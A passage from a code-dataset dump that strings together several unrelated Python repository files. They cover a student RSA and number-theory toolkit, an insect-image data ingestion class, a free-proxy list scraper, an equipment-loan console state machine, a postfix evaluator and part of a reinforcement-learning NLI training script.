',.?><[]*%_@{#} \\\\!/:\\n()+-=\\'\"'\n # self.index_to_char = {\n # index + self.bias :char for index,char in enumerate(self.charset)\n # }\n # self.char_to_index = {\n # char : index for index,char in self.index_to_char.items()\n # }\n \n self.e = random.randint(2,self.phi)\n while gcd(self.e,self.phi) != 1:\n self.e = random.randint(2,self.phi)\n self.d = get_inverse(self.e,self.phi)\n\n def lock(self,m):\n m = str(m)\n tmp = []\n for char in m:\n # tmp.append(self.char_to_index[char])\n tmp.append(ord(char))\n c = []\n for char in tmp:\n char = int(char)\n c_tmp = str(fast_power(char,self.e,self.n))\n c_tmp = '0'*(self.len - len(c_tmp)) + c_tmp \n c.append(c_tmp)\n return ''.join(c)\n \n def unlock(self,c,use_china_res=False):\n if not use_china_res:\n c = str(c)\n m = []\n for i in range(0,len(c),self.len):\n c_char = int(c[i:i+self.len])\n c_char = fast_power(c_char,self.d,self.n)\n # c_char = self.index_to_char[c_char]\n c_char = chr(c_char)\n m.append(str(c_char))\n return ''.join(m)\n else:\n # count = 0\n c = str(c)\n m = []\n for i in range(0,len(c),self.len):\n print(f'Decoding No.{i} char...')\n c_char = int(c[i:i+self.len])\n # c_char = fast_power(c_char,self.d,self.n)\n b1 = fast_power(c_char,self.d,self.p)\n b2 = fast_power(c_char,self.d,self.q)\n c_char = china_res([b1,b2],[self.p,self.q])[0]\n # c_char = self.index_to_char[c_char]\n c_char = chr(c_char)\n m.append(str(c_char))\n return ''.join(m)\n \n\nclass DH():\n def __init__(self):\n super().__init__()\n self.p = 353\n gs = get_primitive_root(self.p)\n index = random.randint(0,len(gs))\n self.g = gs[index]\n self.sk = 233\n self.pk = fast_power(self.g,self.sk,self.p)\n def change(self,pk_2):\n self.sk = fast_power(pk_2,self.sk,self.p)\n\n\ndef is_large_prime(n:int,k:int=4):\n '''\n Use Miller-Rabin method to judge whether number n is a large prime number.\\n\n k in the safe coefficient and when k = 4(default), the accuracy is bigger than 99.99%.\\n\n '''\n if n == 1 or (n & 1) == 0:\n return False\n if n == 2:\n return True\n t = n - 1\n s = 0\n while (t & 1) == 0:\n # t = t >> 1\n t >>= 1\n s += 1\n\n for _ in range(k):\n b = random.randint(2,n)\n while gcd(b,n) != 1:\n b = random.randint(2,n)\n # r = 0\n index = fast_power(b,t,n)\n\n # r = 0\n if index == 1 or index == (n-1):\n continue\n \n flag = False\n for r in range(1,s):\n index = (index**2) % n\n if index == 1:\n return False\n if index == (n-1):\n flag = True\n if flag:\n break\n if flag:\n continue\n else:\n return False\n return True\n\ndef get_large_prime(low:int=2**100,high:int=2**200,k:int=4):\n '''\n Use Miller-Rabin method to find a large prime number.\\n\n Please make sure the difference between low and high is sufficiently big.\\n\n k in the safe coefficient and when k = 4(default), the accuracy is bigger than 99.99%.\\n\n '''\n while True:\n n = random.randint(low,high)\n if is_large_prime(n,k):\n return n\n\n\ndef lian_fen_shu(x,K:int=10):\n '''\n 构造简单的连分数\\n\n x是需要计算的数字\\n\n K是迭代次数 默认是10\\n\n 返回一个元组:第1个元素是近似值,第2个元素是连分数,是一个list\\n\n '''\n tmps = []\n a = math.floor(x)\n x = x - a\n k = 0\n tmps.append(a)\n while x != 0 and k < K:\n a = math.floor(1 / x)\n x = 1/x - a\n tmps.append(a)\n k += 1\n tmps = tmps[::-1]\n ans = tmps[0]\n for index in range(1,len(tmps)):\n ans = 1/ans + tmps[index]\n # print(tmps[::-1])\n return ans,tmps[::-1]\n\n\n\nclass Fenshu():\n def __init__(self,num=1,den=1):\n '''num是分子默认为1\\nden是分母默认为1\\n'''\n super().__init__()\n self.num = int(num)\n self.den = int(den)\n \n def add(self,y):\n num = self.num * y.den + self.den * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def sub(self,y):\n num = self.num * y.den - self.den * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def mul(self,y):\n num = self.num * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def inv(self):\n return Fenshu(self.den,self.num)\n \n def div(self,y):\n return self.mul(y.inv())\n\n def display(self):\n return self.num,self.den\n \n def xiaoshu(self):\n return self.num / self.den\n\n def to_lianfenshu(self):\n '''转换成连分数的形式\\n如果这个分数是负数,会被转换成正数来进行操作\\n'''\n ans = []\n num = abs(self.num)\n den = abs(self.den)\n zhengshu = num // den\n xiaoshu = Fenshu(num - zhengshu * den,den)\n ans.append(zhengshu)\n while xiaoshu.num != 0:\n xiaoshu = xiaoshu.inv()\n zhengshu = xiaoshu.num // xiaoshu.den\n xiaoshu = Fenshu(xiaoshu.num - zhengshu * xiaoshu.den, xiaoshu.den)\n ans.append(zhengshu)\n return ans\n\n\n\ndef lianfenshu_to_float(X:list):\n '''从一个list的连分数转换成分子/分母\\n'''\n X = [Fenshu(x) for x in X]\n ans = X[-1]\n X = X[0:-1][::-1]\n for x in X:\n ans = ans.inv().add(x)\n return ans.display(),ans.xiaoshu()\n\n\n\nif __name__ == '__main__':\n # n = 2**257 - 1\n # n = 19260817\n # for p in [89,107]:\n # n = 2**p - 1\n # print(f'p = {p} , n = {n} , {is_large_prime(n)}')\n # print(gcd(12,10,6,4,6454))\n\n\n # d = DH()\n # d.change(40)\n # a = 61\n # print(get_primitive_root(a))\n # print(is_large_prime(2**67 - 1))\n # n = 2**257 - 1\n # s = 1\n # t = (n-1) // (2**s)\n # print(fast_power(3,t,n))\n\n\n # print(lian_fen_shu(math.pi,10) )\n # with open('ans.json','w',encoding='utf8') as f:\n # ts = [(20210520,113),(210520,191)]\n # ANS = {}\n # for index,t in enumerate(ts):\n # ans = {}\n # a,b = t\n # ans['a'] = a\n # ans['b'] = b\n # ans['连分数'] = lian_fen_shu(a/b,100)[1]\n # # print(lian_fen_shu(a/b,100))\n # # print(bezout(a,b))\n # ans['a的系数'],ans['b的系数'] = bezout(a,b)\n # ANS[index] = ans\n # json.dump(ANS,f,ensure_ascii=False)\n\n # r = RSA()\n # text = ''\n # with open('out.txt','r',encoding='utf8') as f:\n # text = f.read()\n # c = r.lock(text)\n # print(c)\n # with open('cipher_text.txt','w+') as f:\n # f.write(c)\n # print()\n # print(r.unlock(c,False))\n\n\n # all = 0\n # true = 0\n # for n in range(100000):\n # if is_large_prime(n):\n # all += 1\n # if is_prime(n):\n # true += 1\n # print(true / all)\n\n # a = get_large_prime()\n # print(a,get_prime_factors(a))\n pi = [3,7,15,1,293,10,3,8,2,1,3,11,1,2,1,2,1]\n ans = lianfenshu_to_float(pi)\n num = ans[0][0]\n den = ans[0][1]\n print(ans)\n print(pi)\n print(Fenshu(num,den).to_lianfenshu())\n print(Fenshu(22,7).xiaoshu())\n\n\n # a = Fenshu(1,3)\n # b = Fenshu(2,5)\n # c = a.div(b)\n # print(c.display())\n\n \n\n # ms = [5,6,7]\n # m = 1\n # for _ in ms:\n # m *= _\n # Ms = list(map(lambda x:m//x,ms))\n # for Mi,mi in zip(Ms,ms):\n # print(f'{m}/{mi}={Mi}模{mi}逆元是{get_inverse(Mi,mi)}')\n\n\n pass\n\n # for n in [191,191**2,113,113*9]:\n # for b in [2,3,5,7]:\n # print(f'n = {n} , b = {b} , mod = {fast_power(b,n-1,n)}')\n\n# a = [3,1,1,2,3,1,1]\n# a = a[::-1]\n# ans = a[0]\n# for i in range(1,len(a)):\n# ans = 1/ans + a[i]\n# print(ans - 7700/2145)\n\n\n# a = 1\n# for i in range(10000):\n# a = 1/a + 1\n# print(a - (5**0.5+1)/2)","repo_name":"zerzerzerz/xinanshuji","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":26851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24042276584","text":"from FarmInsectsClassifier.entity.config_entity import DataIngestionConfig\nfrom FarmInsectsClassifier.logger import logging\nfrom FarmInsectsClassifier.exception import DataIngestionError\n\nfrom pathlib import Path\nfrom zipfile import ZipFile\nimport splitfolders\n\nclass DataIngestion:\n def __init__(self, data_path: Path, config: DataIngestionConfig):\n self.data_path = data_path\n self.config = config\n\n def unzip(self) -> None:\n \n unzip_path = self.config.unzip_dir\n unzip_path.mkdir(exist_ok=True, parents=True)\n\n logging.info(\"Extracting zip file\")\n\n with ZipFile(self.data_path, \"r\") as zip_ref:\n zip_ref.extractall(unzip_path)\n\n logging.info(\"Zipfile extraction completed\")\n\n \n\n\n def split_data(self) -> None:\n \n path = list(self.config.unzip_dir.resolve().iterdir())[0]\n output = self.config.unzip_dir / \"farm-insects-splitted\"\n\n logging.info(\"Splitting folder into train, test and validation set\")\n\n splitfolders.ratio(path, seed=1, output=str(output), ratio=(0.6, 0.2, 0.2))\n\n logging.info(\"Train, test and validation data successfully created\")\n\n \n","repo_name":"yickysan/Farm-Insects-Classification","sub_path":"src/FarmInsectsClassifier/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40864339359","text":"from collections import namedtuple, defaultdict\nimport requests\nimport itertools\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport shelve\nimport warnings\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nfrom .config import CACHE_PATH\nfrom .exceptions import PageServerDown\n\n\nclass Proxy:\n\n\t__slots__ = ('ip', 'port', 'type', 'anonymous', 'speed', 'time_since_last_check')\n\n\tdef __init__(self, ip, port, type, anonymous, speed, time_since_last_check):\n\t\tself.ip = ip\n\t\tself.port = port\n\t\tself.type = type\n\t\tself.anonymous = anonymous\n\t\tself.speed = speed\n\t\tself.time_since_last_check = time_since_last_check\n\n\tdef to_string(self):\n\t\treturn '{}:{}'.format(self.ip, self.port)\n\n\t__repr__ = __str__ = to_string\n\n\tdef __eq__(self, other):\n\t\treturn self.to_string() == other.to_string()\n\n\tdef __hash__(self):\n\t\treturn hash(self.to_string())\n\n\ndef parse_page(url):\n\t\"\"\" Parse a single html page on https://www.xicidaili.com to get a list of proxies \"\"\"\n\tnow = datetime.today()\n\n\theaders = headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\tpage = requests.get(url, headers=headers)\n\tif page.status_code != 200:\n\t\twarnings.warn('{} could not be connected at the moment'.format(url))\n\t\t# raise PageServerDown('{} could not connect'.format(url))\n\tsoup = BeautifulSoup(page.text, 'lxml')\n\n\tproxies = list()\n\tfor row in soup.find_all('tr'):\n\t\tcols = row.find_all('td')\n\t\tif len(cols) == 10:\n\t\t\tspeed = cols[6].find(class_='bar_inner').attrs['style'] # width:99%\n\t\t\tspeed = float(''.join(filter(lambda x: x.isdigit(), speed)))\n\n\t\t\tlast_check_time = datetime.strptime(cols[-1].text.strip(), '%y-%m-%d %H:%M')\n\t\t\ttime_since_last_check = (now - last_check_time).seconds\n\n\t\t\tp = Proxy(ip=cols[1].text, \n\t\t\t\t\tport=cols[2].text, \n\t\t\t\t\ttype=cols[5].text, \n\t\t\t\t\tanonymous=(cols[4].text=='高匿'), \n\t\t\t\t\tspeed=speed,\n\t\t\t\t\ttime_since_last_check=time_since_last_check)\n\t\t\tproxies.append(p)\n\treturn proxies\n\n\ndef get_proxies(use_cache=False, save=True):\n\t# TODO: http://www.kuaidaili.com/free/inha/\n\n\tif use_cache:\n\t\t# set flag to 'r' to support concurrent reads\n\t\twith shelve.open(CACHE_PATH, flag='r') as f:\n\t\t\tproxies = {k: v for k, v in f.items()}\n\t\t\treturn proxies\n\n\tXICI = 'https://www.xicidaili.com/{}/{}'\n\n\tproxies = defaultdict(list)\n\t# get the first 10 pages\n\t# for url in [XICI.format(*i) for i in itertools.product(['wn', 'wt'], range(1, 11))]:\n\t# \tfor proxy in parse_page(url):\n\t# \t\tproxies[proxy.type].append(proxy)\n\n\twith ThreadPoolExecutor(max_workers=20) as ex:\n\t\tresults = ex.map(parse_page, \n\t\t\t[XICI.format(*i) for i in itertools.product(['wn', 'wt'], range(1, 11))])\n\n\tfor result in results:\n\t\tfor proxy in result:\n\t\t\tproxies[proxy.type].append(proxy)\n\n\tif save:\n\t\t# TODO: adding thread locks here\n\t\twith shelve.open(CACHE_PATH, writeback=True) as f:\n\t\t\tfor k, v in proxies.items():\n\t\t\t\tf[k] = v\n\t\tprint('Saved to {}'.format(CACHE_PATH))\n\treturn proxies\n\n\n","repo_name":"MaxwellLZH/random-proxy","sub_path":"randomproxy/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42605224065","text":"#!/usr/bin/env python\nfrom db.EquipmentRecord import EquipmentRecord\nfrom db.AccountRecord import AccountRecord\nimport state as state\nimport dev.display.Console as Console\nfrom state.commonResource import CommonResource as cmn_res\nfrom db.UserProcedure import UserProcedure\nfrom dev.input import input\n\nclass ConfirmToUpdateProcedure(state.IState):\n def entry(self):\n self.__input = input.SunitizedString(\n input.ConsoleTextField()\n )\n self.__get_next_state = state.ErrorHasOccurred()\n\n Console.clear()\n Console.puts(\"以下の内容で手続きを行います。よろしいですか?(Y/N)\")\n Console.puts(\"ユーザID :\", cmn_res.user.data[AccountRecord.EMPLOYEE_ID])\n Console.puts(\"機材ID :\", cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_ID])\n Console.puts(\"機材名 :\", cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_NAME])\n Console.puts(\"返却予定日:\", cmn_res.equipment.data[EquipmentRecord.END_DATE])\n Console.puts(\">\", end=\"\")\n self.__get_next_state = state.ErrorHasOccurred()\n\n def do(self):\n self.__input.capture()\n\n def exit(self):\n if( self.__input.get_string() in [\"y\",\"Y\"]):\n result = UserProcedure(True).update_equipment_return_date(\n cmn_res.user.data[AccountRecord.EMPLOYEE_ID],\n cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_ID],\n cmn_res.equipment.data[EquipmentRecord.END_DATE])\n if result == True:\n self.__get_next_state = state.SuccessUpdateEquipment()\n else:\n Console.puts(\"更新の受理に失敗しました。\")\n Console.puts(\"再度試しても失敗する場合、システム管理者に問い合わせてください。\", \"\\n\")\n self.__get_next_state = state.ErrorHasOccurred()\n else:\n Console.puts(\"更新手続きをキャンセルしました。\")\n self.__get_next_state = state.GotoNextAfterWaiting()\n self.__get_next_state.set_next_state(state.StandbyUpdateEquipmentIdInput())\n\n def get_next_state(self):\n return self.__get_next_state\n\n def should_exit(self):\n return self.__input.submitted()\n","repo_name":"soudai-aisw/aisw_bihin","sub_path":"src/state/ConfirmToUpdateProcedure.py","file_name":"ConfirmToUpdateProcedure.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"29996906137","text":"\ndef post_fix(expr):\n pieces = expr.split()\n nums = [p for p in pieces if p.isnumeric()]\n ops = [p for p in pieces if not p.isnumeric()]\n \n curr = nums[0]\n \n for num,op in zip(nums[1:],ops):\n curr = str(int(eval(curr+op+num)))\n \n return int(curr)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"kZSi2XWDpu83miexy_1.py","file_name":"kZSi2XWDpu83miexy_1.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41255664595","text":"import os\nimport sys\nimport time\nimport argparse\nfrom collections import Counter\nimport numpy as np\nimport random\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom tqdm import tqdm\nfrom data import get_nli, get_batch, build_vocab\nfrom mutils import get_optimizer\nfrom models import critic, actor\nfrom read_data import get_SICK_data\nprint(\"sick: model_actor_avg0.25_17\")\nparser = argparse.ArgumentParser(description='NLI training')\n\nsamplecnt = 1\nepsilon = 0.05\nalpha = 0.1\nverbose = 1\nif verbose:\n f = open(\"results.txt\", \"w\")\n f.close()\n\nbothCritic = \"both_critic0.25abs_nodelay.pickle-ds\"\nbothActor = \"both_actor0.25abs_nodelay.pickle-ds\"\n\n\n# paths\nparser.add_argument(\"--nlipath\", type=str, default='dataset/SNLI/', help=\"NLI data path (SNLI or MultiNLI)\")\nparser.add_argument(\"--outputdir\", type=str, default='savedir/SOUVIK/', help=\"Output directory\")\nparser.add_argument(\"--criticmodelname\", type=str, default='model_best_souvik.pickle')\nparser.add_argument(\"--actormodelname\", type=str, default='model_actor_avg0.25.pickle')\nparser.add_argument(\"--word_emb_path\", type=str, default=\"dataset/glove.840B.300d.txt\", help=\"word embedding file path\")\n\n# training\nparser.add_argument(\"--n_epochs\", type=int, default=1)\nparser.add_argument(\"--batch_size\", type=int, default=5)\nparser.add_argument(\"--dpout_model\", type=float, default=0., help=\"encoder dropout\")\nparser.add_argument(\"--dpout_fc\", type=float, default=0., help=\"classifier dropout\")\nparser.add_argument(\"--nonlinear_fc\", type=float, default=1, help=\"use nonlinearity in fc\")\nparser.add_argument(\"--optimizer\", type=str, default=\"sgd,lr=0.01\", help=\"adam or sgd,lr=0.1\")\nparser.add_argument(\"--lrshrink\", type=float, default=1, help=\"shrink factor for sgd\")\nparser.add_argument(\"--decay\", type=float, default=0.99, help=\"lr decay\")\nparser.add_argument(\"--minlr\", type=float, default=1e-5, help=\"minimum lr\")\nparser.add_argument(\"--max_norm\", type=float, default=5., help=\"max norm (grad clipping)\")\n\n# model\nparser.add_argument(\"--encoder_type\", type=str, default='InferSent', help=\"see list of encoders\")\nparser.add_argument(\"--enc_lstm_dim\", type=int, default=1024, help=\"encoder nhid dimension\")\nparser.add_argument(\"--n_enc_layers\", type=int, default=1, help=\"encoder num layers\")\nparser.add_argument(\"--fc_dim\", type=int, default=512, help=\"nhid of fc layers\")\nparser.add_argument(\"--n_classes\", type=int, default=3, help=\"entailment/neutral/contradiction\")\nparser.add_argument(\"--pool_type\", type=str, default='max', help=\"max or mean\")\n\n# gpu\nparser.add_argument(\"--gpu_id\", type=int, default=0, help=\"GPU ID\")\nparser.add_argument(\"--seed\", type=int, default=1234, help=\"seed\")\n\n# data\nparser.add_argument(\"--word_emb_dim\", type=int, default=300, help=\"word embedding dimension\")\n\nparams, _ = parser.parse_known_args()\n\n# set gpu device\ntorch.cuda.set_device(params.gpu_id)\n\n# print parameters passed, and all parameters\nprint('\\ntogrep : {0}\\n'.format(sys.argv[1:]))\nprint(params)\n\nnp.random.seed(params.seed)\ntorch.manual_seed(params.seed)\ntorch.cuda.manual_seed(params.seed)\n\n\"\"\"\nDATA\n\"\"\"\n#train, valid, test = get_nli(params.nlipath)\n\ntrain, valid, test = get_SICK_data()\n\nword_vec = build_vocab(train['s1'] + train['s2'] +\n valid['s1'] + valid['s2'] +\n test['s1'] + test['s2'], params.word_emb_path)\n\n\nfor split in ['s1', 's2']:\n for data_type in ['train', 'valid', 'test']:\n eval(data_type)[split] = np.array([[word for word in sent.split() if word in word_vec] for sent in eval(data_type)[split]])\n\n\n\n\"\"\"\nMODEL\n\"\"\"\n# model config\nconfig_nli_model = {\n 'n_words' : len(word_vec) ,\n 'word_emb_dim' : params.word_emb_dim ,\n 'enc_lstm_dim' : params.enc_lstm_dim ,\n 'n_enc_layers' : params.n_enc_layers ,\n 'dpout_model' : params.dpout_model ,\n 'dpout_fc' : params.dpout_fc ,\n 'fc_dim' : params.fc_dim ,\n 'bsize' : params.batch_size ,\n 'n_classes' : params.n_classes ,\n 'pool_type' : params.pool_type ,\n 'nonlinear_fc' : params.nonlinear_fc ,\n 'encoder_type' : params.encoder_type ,\n 'use_cuda' : True ,\n\n}\n\n# model\nencoder_types = ['InferSent', 'BLSTMprojEncoder', 'BGRUlastEncoder',\n 'InnerAttentionMILAEncoder', 'InnerAttentionYANGEncoder',\n 'InnerAttentionNAACLEncoder', 'ConvNetEncoder', 'LSTMEncoder']\nassert params.encoder_type in encoder_types, \"encoder_type must be in \" + \\\n str(encoder_types)\nnli_net = critic(config_nli_model)\nactorModel = actor(params.enc_lstm_dim, params.word_emb_dim)\nprint(nli_net)\nprint(actorModel)\n\n\nfor name, x in nli_net.named_parameters():\n print(name)\n\nfor name, x in actorModel.named_parameters():\n print(name)\n\n#print(nli_net.target_pred.enc_lstm.weight_ih_l0)\n#print(nli_net.target_classifier[4].bias)\n\n# loss\nweight = torch.FloatTensor(params.n_classes).fill_(1)\nloss_fn = nn.CrossEntropyLoss(weight=weight)\nloss_fn.size_average = False\n\n\n# optimizer\noptim_fn, optim_params = get_optimizer(params.optimizer)\ncritic_target_optimizer = optim_fn(list(nli_net.target_pred.parameters()) + list(nli_net.target_classifier.parameters()), **optim_params)\n\noptim_fn2, optim_params2 = get_optimizer(params.optimizer)\ncritic_active_optimizer = optim_fn(list(nli_net.active_pred.parameters()) + list(nli_net.active_classifier.parameters()), **optim_params2)\n\n\noptim_fn3, optim_params3 = get_optimizer(\"adam,lr=0.1\")\nactor_target_optimizer = optim_fn3(actorModel.target_policy.parameters(), **optim_params3)\n\noptim_fn4, optim_params4 = get_optimizer(\"adam,lr=0.1\")\nactor_active_optimizer = optim_fn4(actorModel.active_policy.parameters(), **optim_params4)\n\n# cuda by default\nnli_net.cuda()\nactorModel.cuda()\nloss_fn.cuda()\n\n\ndef Sampling_RL(current, summary, length, epsilon, Random = True):\n current_lower_state = torch.zeros(1, 2*params.enc_lstm_dim).cuda()\n current = current.squeeze(0)\n actions = []\n states = []\n for pos in range(0, length):\n predicted = actorModel.get_target_output(current_lower_state, current[pos], summary, scope = \"target\")\n states.append([current_lower_state, current[pos], summary])\n if Random:\n if random.random() > epsilon:\n action = (0 if random.random() < float(predicted[0].item()) else 1)\n else:\n action = (1 if random.random() < float(predicted[0].item()) else 0)\n else:\n action = int(torch.argmax(predicted))\n actions.append(action)\n if action == 1:\n out_d, current_lower_state = nli_net.forward_lstm(current_lower_state, current[pos], scope = \"target\")\n\n Rinput = []\n for (i, a) in enumerate(actions):\n if a == 1:\n Rinput.append(current[i])\n Rlength = len(Rinput)\n \n if Rlength == 0:\n actions[length-2] = 1\n Rinput.append(current[length-2])\n Rlength = 1\n \n Rinput = torch.stack(Rinput)\n return actions, states, Rinput, Rlength\n \n\n\"\"\"\nTRAIN\n\"\"\"\nval_acc_best = -1e10\nadam_stop = False\nstop_training = False\nlr = optim_params2['lr'] if 'sgd' in params.optimizer else None\n\n\ndef trainepoch(epoch, RL_train = True, LSTM_train = True):\n print('\\nTRAINING : Epoch ' + str(epoch))\n \n actorModel.train(False)\n nli_net.train(False)\n if RL_train:\n print(\"Actor Training\")\n print('Learning rate : {0}'.format(actor_active_optimizer.param_groups[0]['lr']))\n actorModel.train()\n if LSTM_train:\n print(\"InferSent Training\")\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] * params.decay if epoch>1\\\n and 'sgd' in params.optimizer else critic_active_optimizer.param_groups[0]['lr']\n print('Learning rate : {0}'.format(critic_active_optimizer.param_groups[0]['lr']))\n nli_net.train()\n \n all_costs = []\n logs = []\n words_count = 0\n\n last_time = time.time()\n correct = 0.\n # shuffle the data\n permutation = np.random.permutation(len(train['s1']))\n\n s1 = train['s1'][permutation]\n s2 = train['s2'][permutation]\n target = train['label'][permutation]\n\n\n for stidx in tqdm(range(0, len(s1), params.batch_size)):\n \n s1_batch, s1_len = get_batch(s1[stidx:stidx + params.batch_size],\n word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[stidx:stidx + params.batch_size],\n word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[stidx:stidx + s1_batch.size(1)])).cuda()\n k = s1_batch.size(1) # actual batch size\n predict = torch.zeros(s1_batch.size(1), params.n_classes).cuda()\n avgloss = 0.\n totloss = 0.\n nli_net.assign_active_network()\n actorModel.assign_active_network()\n #print(\"Target Weight: \", actorModel.target_policy.W1.weight.data, \"\\n\\n\")\n for kk in range(s1_batch.size(1)):\n left = s1_batch.transpose(0,1)[kk].view(-1, 1, 300)\n right = s2_batch.transpose(0,1)[kk].view(-1, 1, 300)\n left_len = np.array([s1_len[kk]])\n right_len = np.array([s2_len[kk]])\n tgt = tgt_batch[kk].view(-1)\n if RL_train:\n leftSummary = nli_net.summary((left, left_len))[-1]\n rightSummary = nli_net.summary((right, right_len))[-1]\n actionlist_left, actionlist_right, statelist_left, statelist_right, losslist = [], [], [], [], []\n aveloss = 0.\n for i in range(samplecnt):\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=True)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=True)\n actionlist_left.append(actions_left)\n statelist_left.append(states_left)\n actionlist_right.append(actions_right)\n statelist_right.append(states_right)\n out = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n loss_ = loss_fn(out, tgt)\n lossL = (((float(Rlength_left) / int(left.size(1))) + (int(left.size(1)) / float(Rlength_left)) * 0.25) - 1.0)\n lossR = (((float(Rlength_right) / int(right.size(1))) + (int(right.size(1)) / float(Rlength_right)) * 0.25) - 1.0)\n loss_ = loss_ + ((lossL + lossR)/2) * 0.1 * params.n_classes\n aveloss += loss_\n losslist.append(loss_)\n aveloss /= samplecnt\n totloss += aveloss\n grad1 = None\n grad2 = None\n grad3 = None\n grad4 = None\n flag = 0 \n if LSTM_train:\n critic_active_optimizer.zero_grad()\n critic_target_optimizer.zero_grad()\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=False)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=False)\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n predict[kk] = output\n loss = loss_fn(output, tgt)\n avgloss += loss.item()\n loss.backward()\n nli_net.assign_active_network_gradients()\n shrink_factor = 1\n total_norm = 0\n for p in nli_net.active_pred.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n for p in nli_net.active_classifier.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n total_norm = np.sqrt(total_norm.cpu())\n if total_norm > params.max_norm:\n shrink_factor = params.max_norm / total_norm\n current_lr = critic_active_optimizer.param_groups[0]['lr'] # current lr (no external \"lr\", for adam)\n critic_active_optimizer.param_groups[0]['lr'] = current_lr * shrink_factor # just for update\n critic_active_optimizer.param_groups[0]['lr'] = current_lr \n critic_active_optimizer.step()\n actor_target_optimizer.zero_grad()\n for i in range(samplecnt): #5\n for pos in range(len(actionlist_left[i])): #19 --> 13\n rr = [0, 0]\n rr[actionlist_left[i][pos]] = ((losslist[i] - aveloss) * alpha).cpu().item()\n g = actorModel.get_gradient(statelist_left[i][pos][0], statelist_left[i][pos][1], statelist_left[i][pos][2], rr, scope = \"target\")\n if flag == 0:\n grad1 = g[0]\n grad2 = g[1]\n grad3 = g[2]\n grad4 = g[3]\n flag = 1\n else:\n grad1 += g[0]\n grad2 += g[1]\n grad3 += g[2]\n grad4 += g[3]\n for pos in range(len(actionlist_right[i])): # 25 --> 5\n rr = [0, 0]\n rr[actionlist_right[i][pos]] = ((losslist[i] - aveloss) * alpha).cpu().item()\n g = actorModel.get_gradient(statelist_right[i][pos][0], statelist_right[i][pos][1], statelist_right[i][pos][2], rr, scope = \"target\")\n grad1 += g[0]\n grad2 += g[1]\n grad3 += g[2]\n grad4 += g[3]\n actor_active_optimizer.zero_grad()\n actorModel.assign_active_network_gradients(grad1, grad2, grad3, grad4)\n \n actor_active_optimizer.step()\n #output = nli_net((left, left_len), (right, right_len), \"target\")\n _, _, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=False)\n _, _, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=False)\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n predict[kk] = output\n else:\n critic_active_optimizer.zero_grad()\n critic_target_optimizer.zero_grad()\n output = nli_net((left, left_len), (right, right_len), \"target\")\n predict[kk] = output\n loss = loss_fn(output, tgt)\n avgloss += loss.item()\n loss.backward()\n nli_net.assign_active_network_gradients()\n shrink_factor = 1\n total_norm = 0\n for p in nli_net.active_pred.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n for p in nli_net.active_classifier.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n total_norm = np.sqrt(total_norm.cpu())\n if total_norm > params.max_norm:\n shrink_factor = params.max_norm / total_norm\n current_lr = critic_active_optimizer.param_groups[0]['lr'] # current lr (no external \"lr\", for adam)\n critic_active_optimizer.param_groups[0]['lr'] = current_lr * shrink_factor # just for update\n critic_active_optimizer.param_groups[0]['lr'] = current_lr \n critic_active_optimizer.step()\n if RL_train:\n pass\n #actorModel.update_target_network()\n '''\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += 